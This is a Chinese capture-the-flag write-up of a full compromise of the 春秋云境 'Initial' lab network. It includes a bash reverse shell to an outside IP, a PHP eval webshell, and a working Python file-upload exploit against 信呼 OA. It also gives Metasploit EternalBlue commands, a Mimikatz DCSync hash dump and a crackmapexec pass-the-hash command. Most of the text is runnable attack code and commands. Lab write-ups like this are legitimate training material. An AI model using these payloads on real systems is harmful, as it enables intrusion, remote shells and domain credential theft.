春秋云境-Initial

fscan扫一下

直接出漏洞类型

掏出武器库，直接锁定tp工具打马

一键打入，蚁剑直连

找一圈没找到，用虚拟终端看，root权限没有，看sudo位，出现的是mysql，而且免密

sudo -l

那就是mysql的sudo提权

查看文件

接下来扫内网，利用蚁剑上传一个fscan去扫，上传到tmp下，记得修改权限

cd tmp
chmod +x *

但是不知道为什么我在蚁剑上运行fscan就没有，所以觉得去反弹shell

bash -c 'exec bash -i &>/dev/tcp/39.107.xxx.xxx/2333 <&1'

扫一下内网

可以看到内网有172.22.1.18信呼协同，还有MS17-010漏洞

做一个内网通信，可以用frp也可以用stowaway(https://github.com/ph4ntonn/Stowaway/releases/tag/v2.2)

先在服务器运行admin文件后，再在靶机上运行agent得到响应

找到对应linux靶机的agent传到靶机上，admin传到自己服务器上

./linux_x64_admin -l 1234 -s 123

./linux_x64_agent -c 156.238.233.93:1234 -s 123 --reconnect 8

服务器上

use 0
socks 5555

通过sockes可以实现内网通信了，使用proxifier弄一个全局代理

记得配置浏览器的代理

去访问可得，以此将内网资源带到本地浏览器

弱口令登陆

admin/amdin123

登陆后直接利用poc，打一个文件上传nday

import requests

session = requests.session()

url_pre = 'http://172.22.1.18/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'

data1 = {
    'rempass': '0',
    'jmpass': 'false',
    'device': '1625884034525',
    'ltype': '0',
    'adminuser': 'YWRtaW4=',
    'adminpass': 'YWRtaW4xMjM=',
    'yanzm': ''
}


r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('1.php', 'r+')})

filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']
print(id)
print(filepath)
url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'

r = session.get(url3)
r = session.get(url_pre + filepath + "?a=system('dir');")
print(r.text)

<?php eval($_POST[1]);?>

POC打进去

路径查看木马成功写入

找到flag2

还剩一台靶机ms17-010

先永恒之蓝直接打

proxychains4 msfconsole    //做好代理连接，利用msf模块直接打
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.1.21
exploit

得到system权限后用creds_all等命令收集内网凭据，而我们控制的这台机器是有DCSync的权限的(因为这个是DC1，也就是域控制器), 所以能直接从域控上导出Hash

load kiwi
kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit

用crackmapexec打hash传递

proxychains4 crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"

考点是hash传递

msf打永恒得到system权限，利用load wiki得到用户hash

利用全局代理模式进行攻击打入，直接借助用户hash打入admin权限，得到被攻击机权限